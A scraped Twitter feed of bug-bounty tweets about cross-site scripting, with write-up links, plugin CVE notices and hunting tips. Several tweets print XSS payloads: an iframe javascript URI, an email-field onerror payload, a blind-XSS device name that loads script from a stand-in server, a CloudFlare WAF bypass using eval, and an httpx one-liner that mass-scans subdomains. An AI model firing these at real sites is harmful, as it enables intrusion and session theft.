Twitter Feed
![profile](https://pbs.twimg.com/profile_images/1651674719135965184/ryb9-sS3_normal.jpg)
Rachid.A (zhero_) 🇵🇸
@blank_colda year agoMy write-up on my solution to the Intigriti XSS challenge has been selected, don't hesitate to take a look! 🧩 Thanks @intigriti! Here : https://t.co/QLivsjCNNb #CTF #Hacking #bugbountytips #bugbountytip https://t.co/a9VbeF8mwi
![profile](https://pbs.twimg.com/profile_images/1570234561694425088/09ft7QSF_normal.jpg)
Ziad Ali
@ziadali84681393a year agoExploit an unexploitable XSS via an open redirect — A Real-Life Scenario from a Hacker’s Mindset https://t.co/z3HBoRS8fn #infosec #cybersecurity #cybersecuritytips #pentesting #redteam #CyberSec #cyberattacks #cybersecurityawareness #bugbounty #bugbountytips #xss #medium
![profile](https://pbs.twimg.com/profile_images/1288492371643179008/4vbcWwLH_normal.jpg)
Cristiano
@TheMsterDoctor1a year ago@hakluke @hbenja_m How to hack web applications in 2023: Part 1 🚀 💻 Types of web apps ⚙️ Setting up for testing 🪲 RCE 🐞 SQLi 🐛 XXE 🪳 Insecure Deserialization 🐜 XSS And that's just Part 1! 😱 👇 #hacking #pentesting #bugbountytip https://t.co/23mql5Wuk9
![profile](https://pbs.twimg.com/profile_images/1497895043448946692/cfw-et47_normal.jpg)
HackenProof
@HackenProofa year agoVuln: Stored XSS A persistent attack aims to inject malicious code into popular user-supplied input points, such as comments on blog posts, username fields, and message boards. #bugbounty #offensivesecurity https://t.co/3OqZFnnINU
![profile](https://pbs.twimg.com/profile_images/1629860738259886084/3HYzBdWG_normal.jpg)
HADESS
@Hadess_securitya year ago🧪 XSS Labs 1️⃣ node-react-dangerously-set-html-links https://t.co/ql3AyDhI5i 2️⃣ dotnet-can-you-see-your-reflection https://t.co/sO5qtvmVHF 3️⃣ java-reflected-xss https://t.co/eAfqy2tIvK #xss #appsec #securecoding #bugbounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ Stored XSS in merge request pages 👨💻 mike12 ➟ GitLab 🟥 High 💰 $3,500 https://t.co/wTWRzBM22U #bugbounty #bugbountytips #cybersecurity https://t.co/wKp5mtZOZN
![profile](https://pbs.twimg.com/profile_images/1655215939573489664/CI14Xy7T_normal.jpg)
Akanbi Oluwakunle Johnson
@akanbi_kunlea year agoGood day, My journey in #XSS #BugBounty is getting more interesting and lovely. $ (Json) leads to a lot of rat role in a program if is not properly use. As a rogrammer is ideal to create different Folder for all your PROG language...@esther_hamzat @0x0SojalSec @cybergbeja
![profile](https://pbs.twimg.com/profile_images/1656964091259527168/NdyAfP-k_normal.jpg)
CRAC Learning - Tech
@cracbota year agoCVE-2023-27613 (CVSS:7.1, HIGH) is Received. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in MonitorClick Forms Ada – Form Builder plugin <= 1.0 versio..https://t.co/O65YCMSXtL #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
![profile](https://pbs.twimg.com/profile_images/1581114111915888641/au1vvoIY_normal.jpg)
ss0x00 🤞
@ss0x00a year agoAutomation found an easy DOM XSS in one of the H1 target. Takeaways: Running automation on a large scale works :) Article I discussed about this: https://t.co/b8lGMN9GmE #bugbounty #bugbountytips #automation https://t.co/0uBPAQnFEO
![profile](https://pbs.twimg.com/profile_images/1572291341748699136/9e--qSOg_normal.jpg)
cyb3r_ark97
@ironrafeliaa year ago#cyb3r_ark97stipsntricks #1 When you want to create XSS payload for a subdomain of a target... Don't forget to look at the page source to see where your input is getting stored....if not then use Burp Suite intercept to see if the input gets transferred to an API #bugbounty
![profile](https://pbs.twimg.com/profile_images/1663284683801542656/FaOCjpQm_normal.jpg)
VIEH Group
@viehgroupa year agoThe XSS Revolution: A Game-Changer in the Cybersecurity Landscape https://t.co/6fZSPehvFN #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1658944295913627655/bqAtFhrL_normal.jpg)
EL Sayed Mohammed
@ElsayedMo77ameda year agoMy last submition @Bugcrowd Cross site scripting (xss) Html injection. Program vdp 🤡 #bugbountytip #bugbounty #xss #bugcrowd https://t.co/Y3qoWSMlPK
![profile](https://pbs.twimg.com/profile_images/1335666259187347457/cYRfzQxg_normal.png)
BeyondMachines
@beyondmachines1a year agoXSS Flaw Exposes Wordpress Beautiful Cookie Consent Banner plugin to attack campaign #cybersecurity #infosec #advisory #vulnerability https://t.co/wbqT4nDrsF
![profile](https://pbs.twimg.com/profile_images/1418087718408523776/wY-1xb3-_normal.jpg)
Cybertix
@thecybertixa year ago𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Blind XSS 🫣 𝙇𝙞𝙣𝙠: https://t.co/PCBVvU1w3y 𝙋𝙡𝙚𝙖𝙨𝙚 𝙎𝙝𝙖𝙧𝙚 𝙮𝙤𝙪𝙧 𝙑𝙞𝙚𝙬𝙨 & 𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏 𝙏𝙝𝙖𝙣𝙠𝙨 𝙚𝙫𝙚𝙧𝙮𝙤𝙣𝙚 𝙛𝙤𝙧 𝙮𝙤𝙪𝙧 𝙜𝙧𝙚𝙖𝙩 𝙎𝙪𝙥𝙥𝙤𝙧𝙩☺️ #bugbountytips #YouTube #bug https://t.co/uSt1b1iQBl
![profile](https://pbs.twimg.com/profile_images/1045681989095960577/kl5G4rq7_normal.jpg)
Shah Sheikh
@shah_sheikha year agoXSS Flaw Riddled Beautiful Cookie Consent Banner WP Plugin: Heads up, WordPress admins! It’s time to update your websites with the latest Beautiful Cookie… XSS Flaw Riddled Beautiful Cookie Consent Banner WP Plugin on Latest Hacking News | Cyber… https://t.co/u5lOnoxAUj https://t.co/iDIvgYMC6r
![profile](https://pbs.twimg.com/profile_images/1593230281590251521/BxnDUO-H_normal.jpg)
Sayaan Alam
@ehsayaana year agoFound a stored and blind xss on HackerOne through live support chat , <script> tag didn’t worked so I used <iframe src=“javascript:alert(document.domain)” /> and it did worked #bugbounty https://t.co/sVFmgS4YNH
![profile](https://pbs.twimg.com/profile_images/1613395553202888704/lkPcmuM-_normal.jpg)
Md Maruf Hosan ⚡
@0xMarufa year agoScript tag blocked? No more blind xss? Try blind HTML injection. Tip: "><img src=https://t.co/s4t6cjAdsb> #bugbountytips #bugbountytip #BugBounty
![profile](https://pbs.twimg.com/profile_images/1634509877879111680/syZYfFZF_normal.jpg)
CyberSherlockX
@cybersherlockxa year agoHi #bugbounty community, can you help me escalate an open redirect to XSS or SSRF? I have tried a few things, but I am unable to escalate it further. Your suggestions will be appreciated #bugbounty #infosec #cybersecurity @GodfatherOrwa @ADITYASHENDE17
![profile](https://pbs.twimg.com/profile_images/1598017040119365648/37ERWO1J_normal.jpg)
Ali Tütüncü
@alicanact60a year ago@LiveOverflow @SaveToNotiom #bugbountytips #XSS #P1 #P0 Thx
![profile](https://pbs.twimg.com/profile_images/1570840088397090816/rWOAH9mz_normal.jpg)
HackTube5
@HackTube5a year agoCVE-2023-29489 Cpanel xss #cve #BugBounty #xss https://t.co/dPI81pYeR9
![profile](https://pbs.twimg.com/profile_images/1656964091259527168/NdyAfP-k_normal.jpg)
CRAC Learning - Tech
@cracbota year agoCVE-2023-33332 (CVSS:7.1, HIGH) is Received. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WooCommerce Product Vendors plugin <= 2.1.76 versions...https://t.co/85AutunaMR #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
![profile](https://pbs.twimg.com/profile_images/1656964091259527168/NdyAfP-k_normal.jpg)
CRAC Learning - Tech
@cracbota year agoCVE-2023-33319 (CVSS:7.1, HIGH) is Received. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WooCommerce WooCommerce Follow-Up Emails (AutomateWoo) plu..https://t.co/LTLnE19Osh #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
![profile](https://pbs.twimg.com/profile_images/1656964091259527168/NdyAfP-k_normal.jpg)
CRAC Learning - Tech
@cracbota year agoCVE-2023-32800 (CVSS:7.1, HIGH) is Received. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in One Rank Math SEO PRO plugin <= 3.0.35 versions...https://t.co/MxsH5gXhGE #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
![profile](https://pbs.twimg.com/profile_images/1656964091259527168/NdyAfP-k_normal.jpg)
CRAC Learning - Tech
@cracbota year agoCVE-2023-33326 (CVSS:7.1, HIGH) is Awaiting Analysis. Unauth. Reflected (XSS) Cross-Site Scripting (XSS) vulnerability in EventPrime plugin <= 2.8.6 versions...https://t.co/Le8nLL5Jea #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
![profile](https://pbs.twimg.com/profile_images/1656964091259527168/NdyAfP-k_normal.jpg)
CRAC Learning - Tech
@cracbota year agoCVE-2023-33309 (CVSS:7.1, HIGH) is Awaiting Analysis. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Awesome Motive Duplicator Pro plugin <= 4.5.11 versions...https://t.co/Ep83piJSKH #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
![profile](https://pbs.twimg.com/profile_images/1377946230261755904/_19tRK8U_normal.jpg)
Maham Farizul
@0xmahamseca year agoTips whenever you saw any email input field! 70% bug hunters don't try XSS there as compared to name field. always try this in email input field! "<img/src/onerror=alert(0)"@xss.com This don't work every time but give it a try found 2 XSS today using this! #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1487525559228059648/Tr6xoJix_normal.jpg)
hakluke 👨💻🚀
@haklukea year agoHow to hack web applications in 2023: Part 1 🚀 💻 Types of web apps ⚙️ Setting up for testing 🪲 RCE 🐞 SQLi 🐛 XXE 🪳 Insecure Deserialization 🐜 XSS And that's just Part 1! 😱 👇 #hacking #pentesting #bugbounty https://t.co/uHIDJu0if2
![profile](https://pbs.twimg.com/profile_images/1655295861201543168/v4V2SxVu_normal.jpg)
Jambler.org
@NewsesBtca year agoIt's faster than zomato I reported vulnerability and within 30 minutes I got response from company.🤩🤑 It's an blind xss triggered on admin panel. #BugBounty #cybersecuritytips #ethicalhacking #xss https://t.co/fEPYypKp4t
![profile](https://pbs.twimg.com/profile_images/1651674719135965184/ryb9-sS3_normal.jpg)
Rachid.A (zhero_) 🇵🇸
@blank_colda year agoI admit, I spent a while on it. But I got arbitrary XSS on mozilla/chrome without limit - with 90 characters. Can't wait to see the colleagues' payloads. I will now write my report on @intigriti and go back to hunting 🏹 #BugBounty #infosec #CTF https://t.co/BKzJw8hZqi https://t.co/6g5lN51Ab7
![profile](https://pbs.twimg.com/profile_images/1662070864274239489/owlKcsFh_normal.jpg)
Amir Hossein
@amir_h_fallahia year agoتو این ویدیو به بررسی XSS تو Vue.js پرداختم. که برای برنامه نویس ها و باگ هانترا و پن تسترا میتونه مفید واقع بشه امیدوارم خوشتون بیاد اسلاید ها: https://t.co/k3O4Kk1ltk https://t.co/RMNAeAHImq #AppSec #XSS #web_security #Vue #bugbounty #pentest
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
WAF bypass
@waf_bypassa year agowaf_bypass is sharing the best way to #bypass #WAF XSS Payloads - simple, effective & tested! 💡It's worth checking out for 🤗great results. 💻#infosec #cybersecurity #XSSpayload https://t.co/nRB2cNxmkt
![profile](https://pbs.twimg.com/profile_images/1657782045777747968/mWppnfV9_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoThe XSS Revolution: A Game-Changer in the Cybersecurity Landscape by: thexssrat https://t.co/QM8iDtOZs7 #bugbounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1581171994980384772/q-EZkbXa_normal.jpg)
Shubham Tiwari
@shubhamtiwari_ra year agoExcited to share my Bug Bounty Script It automates security tests & reconnaissance for target domains including, web server scanning, subdomain enumeration XSS vulnerability scanning, and more!🐞🔍 Check it out GitHub: [https://t.co/gqvmvMqNyH] #BugBounty #SecurityTesting #bug
![profile](https://pbs.twimg.com/profile_images/1659523844787392514/-dmgsL_d_normal.jpg)
Who Am I ?
@19who_am_i19a year agoMy New Reflected Xss write up , Check it out !!🖤 https://t.co/vyOFZc6bXI #bugbountytips #BugBounty #websecurity #cybersecuritytips #hackers #HackerOne
![profile](https://pbs.twimg.com/profile_images/1646131549035790337/uyvgijol_normal.jpg)
LinuxSecurity Live Advisory Updates
@LS_Advisoriesa year agoCross site scripting (XSS) vulnerabilities were found in rainloop, a web based email client, which could lead to information disclosure including passphrase leak. Debian LTS... @lnxsec #DebianLTS #Linux #infosec #opensource #linuxsecurity https://t.co/loKeGkEn1K https://t.co/Oy5VJSEAwR
![profile](https://pbs.twimg.com/profile_images/1655215939573489664/CI14Xy7T_normal.jpg)
Akanbi Oluwakunle Johnson
@akanbi_kunlea year agoJust found a Reflected XSS on a site. The site uses java script Library, the site encode any XSS payload automatically. {Second Slide} Using URL encode to base64URL it shows the site is Vulnerable to Reflected XSS. ( First Slide) #bugbounty #BugBounty #bugbountytips https://t.co/tyudW4wIPN
![profile](https://pbs.twimg.com/profile_images/1418578449078185987/RKWC_IPP_normal.jpg)
Osvaldo G Del Rio
@0sdelri0a year agoSharing a small XSS - BugBounty! :) https://t.co/1FGJnUzYcd
![profile](https://pbs.twimg.com/profile_images/1655215939573489664/CI14Xy7T_normal.jpg)
Akanbi Oluwakunle Johnson
@akanbi_kunlea year agoI am working on XSS alone anything about XSS Bug bounty. #Bugbounty #Xsspayloads #Burpsuite @0xblackbird thanks of the link. Will be submitting my first XSS Bug in a short time.
![profile](https://pbs.twimg.com/profile_images/1663284683801542656/FaOCjpQm_normal.jpg)
VIEH Group
@viehgroupa year agoAutomated XSS at Scale | Powered by @pdiscoveryio | Creds: @_bughunter cat rootDomains.txt | assetfinder -subs-only | httpx -nc -silent -t 50 -p 80,443,8443,8080 -path "/?xss=\"</script><script>alert(\"XSS\")</script>" -mr "<script>alert(\"XSS\")</script>" #infosec #cybersec
![profile](https://pbs.twimg.com/profile_images/1580881214713786368/U17JUqtT_normal.jpg)
haksec.io
@haksecioa year agoPro hacking tip: Set keyboard shortcuts for your go to XSS and SQLi payloads!
![profile](https://pbs.twimg.com/profile_images/1649034614042681345/i8oFRGCE_normal.jpg)
HackersNews.co.uk
@HackersNews247a year agoFind Us @HackersNews247 For The Latest News Or Visit Our Website Hackers News! #Hacking #Hacked #HackersNews #hacker #Hackingtime #Anonymous #hacktheplanet #news #NewsUpdates https://t.co/ViTSIJ6qnw
![profile](https://pbs.twimg.com/profile_images/1594275038341091329/36UFMiVM_normal.jpg)
Hammad 🇵🇰
@Hammad7361a year agoAfter 2 months of Triaged report I was awarded $$$ on @Bugcrowd #ItTakesACrowd #bugbounty Reward range was $100-$750 for P3 and they choosed to pay $100 😂, Submitted them 1 more XSS will have to wait 2 months again to get that $100 again 😂 https://t.co/nWn1is9Ind
![profile](https://pbs.twimg.com/profile_images/1495283209911046146/xaRvDTXr_normal.jpg)
$@urabh $!ddh@®am $@nmane
@saurabhsanmane2a year agoIt's faster than zomato I reported vulnerability and within 30 minutes I got response from company.🤩🤑 It's an blind xss triggered on admin panel. #BugBounty #cybersecuritytips #ethicalhacking #xss https://t.co/0s8VX1d14S
![profile](https://pbs.twimg.com/profile_images/1656964091259527168/NdyAfP-k_normal.jpg)
CRAC Learning - Tech
@cracbota year agoCVE-2023-21516 (CVSS:7.5, HIGH) is Received. XSS vulnerability from InstantPlay in Galaxy Store prior to version 4.5.49.8 allows attackers to execute javascript API ..https://t.co/F1I2x1J7ME #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
![profile](https://pbs.twimg.com/profile_images/1656964091259527168/NdyAfP-k_normal.jpg)
CRAC Learning - Tech
@cracbota year agoCVE-2023-29098 (CVSS:7.1, HIGH) is Awaiting Analysis. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in ArtistScope CopySafe Web Protection plugin <= 3.13 version..https://t.co/JueoJEeuKx #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
![profile](https://pbs.twimg.com/profile_images/1626268981274505218/1kaj8Ypc_normal.jpg)
Cyber Wiki
@theCyberWikia year agoTOR Network - https://t.co/JkE9jtpcTi #CyberWiki #theCyberWiki #HackHunt #Hack #Hacker #Hacking #EthicalHacking #Network #EthicalHacker #Cybersecure #Cybersecurity #Vulnerable #Software #Pentesting #XSS #VAPT #Audit #Forensics #Coding #BugHunting #TOR #DarkWeb #OnionRouter https://t.co/uXGeMkOTs5
![profile](https://pbs.twimg.com/profile_images/1443777892941328384/YBVZt_U__normal.jpg)
im-ream.nft🗸
@im_reama year ago@MeAsHacker_HNA @SaveToNotion #tweet #xss #bugbounty #tools
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
WAF bypass
@waf_bypassa year ago🤓 WAF_Bypass has shared great insights on how to #bypass #WAF XSS Payloads! 💡It's simple & effective. 🤗Check it out now for the best results. 💻 #infosec #cybersecurity #XSSpayload https://t.co/nRB2cNxmkt
![profile](https://pbs.twimg.com/profile_images/1610041810251878404/7UnExi0N_normal.jpg)
Infination Technology
@infinationa year ago#bugbounty #discovery #exploitation #tooling #techniques #tradecraft #Expo #Gitlab #Trezor #Nokoyawa $MSFT #Windows #zeroday $GOOGL #GCP #CloudSQL #Zyxel #Barracuda #Wordpress #XSS #infosec #security
![profile](https://pbs.twimg.com/profile_images/1662165639937798144/VEBa4m5m_normal.jpg)
Seribuakal
@Seribuakala year agoXSS To RCE Exploits #infosec #cybersecurity #bugbounty #hacking #exploits #seribuakal #tips https://t.co/GbF68TG1Vi
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
WAF bypass
@waf_bypassa year agoSeribuakal shares 💡key insights on how to bypass #WAF XSS Payloads with simple yet effective techniques. 🤓Check it out now for the best results! 🤗https://t.co/nRB2cNxmkt #infosec #cybersecurity #XSSpayload
![profile](https://pbs.twimg.com/profile_images/1607826072917221376/6TtbQQP-_normal.jpg)
Zack Security
@ZackSecutitya year ago#BugBounty #bugbountytips #hackerspace #Linux #XSS #LFI #DeepWeb #websecurity #Apps #bugs #Web3 #webdevelopment https://t.co/xNvcY8Q2FE
![profile](https://pbs.twimg.com/profile_images/1646190543939026958/A8X70PMt_normal.png)
ASecurity
@asecurityinfoa year agoBasic of XSS #asecurity #BugBounty #bugbountytips (1/2) https://t.co/haMO2ul27T
![profile](https://pbs.twimg.com/profile_images/1550997937223770112/Vuwd45Jf_normal.png)
Bug bounty notes
@bugbounty0a year agoHow I found DOM-Based XSS on Microsoft MSRC and How they fixed it #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/3YsKYbAsPB
![profile](https://pbs.twimg.com/profile_images/1646190543939026958/A8X70PMt_normal.png)
ASecurity
@asecurityinfoa year agoXSS BYPASS PAYLOAD #websecurity #asecurity #xss #payloads #bypass #xsspayloads #bugbounty #bugbountytips https://t.co/Eb6KMIgP01
![profile](https://pbs.twimg.com/profile_images/1663187394131111936/YurDKFDU_normal.jpg)
Thee Eclipse
@Thee_Eclipsea year agoIts 30 days since: cPanel CVE-2023-29489 !! Time to hunt for it on bug bounty programs!! 🎩Did you know:: CVE-2023-29489 bypasses the 403 Forbidden error and renders XSS on the pages #BugBounty #bugbountytips #Hacking #CyberSecurityAwareness #intigriti #cpanel #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1656964091259527168/NdyAfP-k_normal.jpg)
CRAC Learning - Tech
@cracbota year agoCVE-2022-45366 (CVSS:7.1, HIGH) is Awaiting Analysis. Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Jason Crouse, VeronaLabs Slimstat Analytics plugin <= 5.0...https://t.co/NWpId7p1oB #cybersecurityawareness #cybersecurity #CVE #infosec #hacker #nvd #mitre
![profile](https://pbs.twimg.com/profile_images/1410588917666136073/_-zArZPH_normal.png)
Linode
@linodea year agoThis week's security digest covers a Linux NetFilter use-after-free Kernel vulnerability, WordPress Core v6.2 XSS/CSRF/Directory Traversal vulnerabilities, and more: https://t.co/HLMIDgxP30 #InfoSec #CyberSecurity
![profile](https://pbs.twimg.com/profile_images/1648784692681003008/rA2v7Ojw_normal.jpg)
Bhagirath Saxena 🇮🇳
@rix4unia year agoI need some help, i spend around 14 days on a program that have a wildcard *https://t.co/FbAW6BO1qd tested xss,lfi,sqli,ssrf,rce but not found anything, what you will recommend to stick this program or move other program @GodfatherOrwa @krishnsec @bug_vs_me #bugbounty
![profile](https://pbs.twimg.com/profile_images/1113485744771698688/gbDDFbV1_normal.jpg)
Brier & Thorn México
@BrierandThornMXa year agoAtaques en curso están dirigidos a una vulnerabilidad de secuencias de comandos entre sitios almacenados (XSS) no autenticadas en un complemento de consentimiento de cookies de #WordPress llamado Beautiful Cookie Consent Banner . #2023 #Infosec #BT https://t.co/If5F2VA3Py
![profile](https://pbs.twimg.com/profile_images/1661468468267606016/ooDIo7U5_normal.jpg)
wtf_yodhha
@wtf_yodhhaa year agoBugbounty Tip✅✨ For Android devices, Modify the device name to your BXSS payload "><script/src=//yourserver.xss.ht>//" There is a possibility that the device name leading to blind XSS issues in various applications. #bugbountytips #bugbounty #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1501276222520709125/GW7KuNrg_normal.jpg)
Joh
@ctfiraqa year ago@h4x0r_dz Because it’s the real hacking Not just an xss you found in searchbar and you got 💲💲😆
![profile](https://pbs.twimg.com/profile_images/1582414617581846529/xxZ2tz7b_normal.png)
oolong
@hacksForOolonga year agoDay 35 of #100DaysOfHacking Just solved : Web - Client/XSS DOM Based - Filters Bypass challenge on Root-Me :þ https://t.co/t0bUBHAojp @rootme_org #hacking #challenge #WebClient
![profile](https://pbs.twimg.com/profile_images/1582414617581846529/xxZ2tz7b_normal.png)
oolong
@hacksForOolonga year agoDay 35 of #100DaysOfHacking Just solved : Web - Client/XSS DOM Based - Introduction challenge on Root-Me :þ https://t.co/Sl7iCcWhw0 @rootme_org #hacking #challenge #WebClient
![profile](https://pbs.twimg.com/profile_images/1654896729848938498/RkAnUj51_normal.jpg)
7h3h4ckv157
@7h3h4ckv157a year agoXSS Via Qr Code https://t.co/Zt8qFKgua1 #xss #QR #WebsiteTesting #VulnerabilityAssesment #infosec #Medium #bug #bugbountytips #BugBounty #bugbountytip #Hacking
![profile](https://pbs.twimg.com/profile_images/1654896729848938498/RkAnUj51_normal.jpg)
7h3h4ckv157
@7h3h4ckv157a year agoHow I found a tricky XSS https://t.co/rD3Qj9wNVh #xss #bugbountytips #BugBounty #BugBounty #bug #infosec
![profile](https://pbs.twimg.com/profile_images/1654896729848938498/RkAnUj51_normal.jpg)
7h3h4ckv157
@7h3h4ckv157a year agoHow I found Reflected XSS in Users login page on Public Program ? https://t.co/tko1d2Unba #bugbountytips #BugBounty #bugbountytip #bug #XSS #infosec #Medium
![profile](https://pbs.twimg.com/profile_images/1643803029689491457/Lh0k6w21_normal.jpg)
M S Munir
@ms_munir_420a year agoReflected XSS Approach Credits: https://t.co/UWQKv6teqy #infosec #cybersecurity #cybersecuritytips #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #security #linux #cybersecurityawareness #bugbounty #bugbountytips https://t.co/X09lzEuwMN
![profile](https://pbs.twimg.com/profile_images/1612799784754237440/9xFiZOhf_normal.jpg)
unpaired_electron
@Ajay_jachak24a year agoThe filename is reflected on a web page is there any way to execute the XSS here?? DM me #BugBounty #bugbountytips #HackerOne #BugCrowd https://t.co/vsTI34idFq
![profile](https://pbs.twimg.com/profile_images/1496426484038316037/WC5DxQ2V_normal.jpg)
LaneSystems Ltd
@LaneSystemsa year ago#Hackers target 1.5M #WordPress sites with cookie consent plugin exploit https://t.co/rxbT3bcHRV Ongoing attacks for #XSS #vulnerability in #BeautifulCookieConsentBanner plugin. Upgrade to v2.10.2 #CyberSecurity #InfoSec #Patch
![profile](https://pbs.twimg.com/profile_images/631831155231322112/Z3cI13po_normal.jpg)
Darren Ewers
@DarrenEwersa year agoHackers target 1.5M WordPress sites with cookie consent plugin exploit. Ongoing attacks are targeting an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in a WordPress cookie consent plugin https://t.co/04FM5mrriq #Hacking #Wordpress #hackers #HackersNews
![profile](https://pbs.twimg.com/profile_images/1657390301147811840/UEb6QdLX_normal.jpg)
Ares Austria
@ares_austriaa year ago@y3tiCrypto @dynexcoin Imagine being this lax about security, though. It's incredible. The Cloudflare WAF patches a simple XSS for the new domain, but there's more from where this came from for the explorer and new client wallet 😱 #infosec #security $DNX #dynex #CryptoTwitter https://t.co/SfyFWzeTcb https://t.co/oRTkSduNew
![profile](https://pbs.twimg.com/profile_images/1568913347273457664/Jvq20WBi_normal.jpg)
Lohitaksh Nandan
@NandanLohitaksha year agoBurpsuite Extensions for #XSS • XSS Validator • Reflected Parameters • DOM XSS Checks • Burp Hunter • Reflector • Feminda • BitBlinder #bugbounty #bugbountytips #hacking #pentesting #cybersecurity
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
WAF bypass
@waf_bypassa year agoKudos to cyberninja8881 & SchoobyDrew for their 💪 teamwork to crack an XSS vuln & get a CVE! 🎉 Check out their blog post to learn how they bypassed a WAF. 🤓 #cybersecurity #infosec #WAF #XSS 🛡️ 🔐 🔗 https://t.co/dHjvyuRVO9
![profile](https://pbs.twimg.com/profile_images/1513029335992709123/siun2a1A_normal.jpg)
MITUL KALSARIYA
@Mitulkalsariya2a year agoStudy common security vulnerabilities like SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF). Familiarize yourself with cybersecurity concepts like encryption, authentication, and penetration testing. #InfoSec #CyberAwareness
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
WAF bypass
@waf_bypassa year agoKudos to cyberninja8881 & SchoobyDrew for their 💪 teamwork to find an XSS vuln & get a CVE! 🤓 Read their blog post to find out how they bypassed a WAF. 🔗 https://t.co/dHjvyuRVO9 #cybersecurity #infosec #WAF #XSS 🛡️ 🔐
![profile](https://pbs.twimg.com/profile_images/1313330806589255681/fxhLPf40_normal.jpg)
Raj Haraniya
@rpharaniyaa year ago@_Zer0Sec_ @SaveToNotion #tweet #bugbounty #xss
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoCloudFlare WAF bypass inside <A> tag or location=payload example.tld/#1/-alert(23)// javascript:Object.prototype.toString=RegExp.prototype.toString;Object.prototype.source=location.hash;[{}]+[]/**/instanceof{[Symbol.hasInstance]:eval} Credits: https://t.co/4PtYYK4tFr #infosec
![profile](https://pbs.twimg.com/profile_images/1196472306949918721/Zbk8ZOaj_normal.jpg)
ႢႭႹႠ ႭႵႰႠႻႤ გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradzea year ago#bugbountytips #BugBounty @WebSecAcademy Self reflect XSS on the portswigger web security academy JWT lab https://t.co/9XFjRs5YIO via @YouTube
![profile](https://pbs.twimg.com/profile_images/1222921361884176384/l3swp1v5_normal.jpg)
Ali Alhamad علي الحمد
@proalialhamada year agoأداة مفيدة وسريعة لاستخدام google dorks لالتقاط ثغرات xss و Open redirects و information disclosure https://t.co/u3ojhopttE #bugbountytips #BugBounty https://t.co/RekEqucNsc
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoBlind XSS All 📓 - https://t.co/7yL4G3AI7B - https://t.co/kMfCYBFuIf - https://t.co/aDLeQul8bG - https://t.co/MgoHmAJTKA - https://t.co/E0V4mTcKZ5 - https://t.co/X5zoaDnNw9 by @thecyberzeel https://t.co/sA7M5btOcW by @0xAwali #infosec #learn365 #bugbounty
![profile](https://pbs.twimg.com/profile_images/1663279607251099651/toidgeO5_normal.jpg)
Masonhck357
@Masonhck3571a year ago#Bugbountytips When hunting for Blind XSS, remember to use a unique identifier for each payload and log your steps meticulously. That way, when a delayed trigger hits your XSS Hunter account, you’ll know exactly where it came from. Stay patient, stay diligent! #masonhck357… https://t.co/TyowQlSNNl
![profile](https://pbs.twimg.com/profile_images/1492586322271297540/qUKKrIlQ_normal.jpg)
Shane Brighton
@shanebrightona year agoIdentify and Fix XSS Vulnerabilities in Your Web App https://t.co/uKEn5FmuDu #cloudsecurity #itsecurity #secops #infosec
![profile](https://pbs.twimg.com/profile_images/1082875994623565824/kLGfvlP4_normal.jpg)
SearchEngineJournal®
@sejournala year agoThis #WordPress plugin makes your site vulnerable to Cross-Site Scripting (XSS) attacks https://t.co/inpjEwTLut #infosec #technicalseo https://t.co/Q394oBllXC
![profile](https://pbs.twimg.com/profile_images/1611794289373093888/fKx622P4_normal.jpg)
Cybernoz
@Cybernozcoma year agoThe basics of Cross-site Scripting (XSS) https://t.co/c3Jw5EKVCZ #cybersecurity #cybersecuritynews #cybernews #infosec #informationsecurity
![profile](https://pbs.twimg.com/profile_images/1605253286474424329/GZAfiBXj_normal.png)
Nova Security
@novasecioa year ago2) Get more advanced: https://t.co/Dzu5fYsbHB https://t.co/YRBLEnYtv2 https://t.co/5GbWfT7eFD https://t.co/jCyyR7J7Gj https://t.co/6tR1JWndQP
![profile](https://pbs.twimg.com/profile_images/1605253286474424329/GZAfiBXj_normal.png)
Nova Security
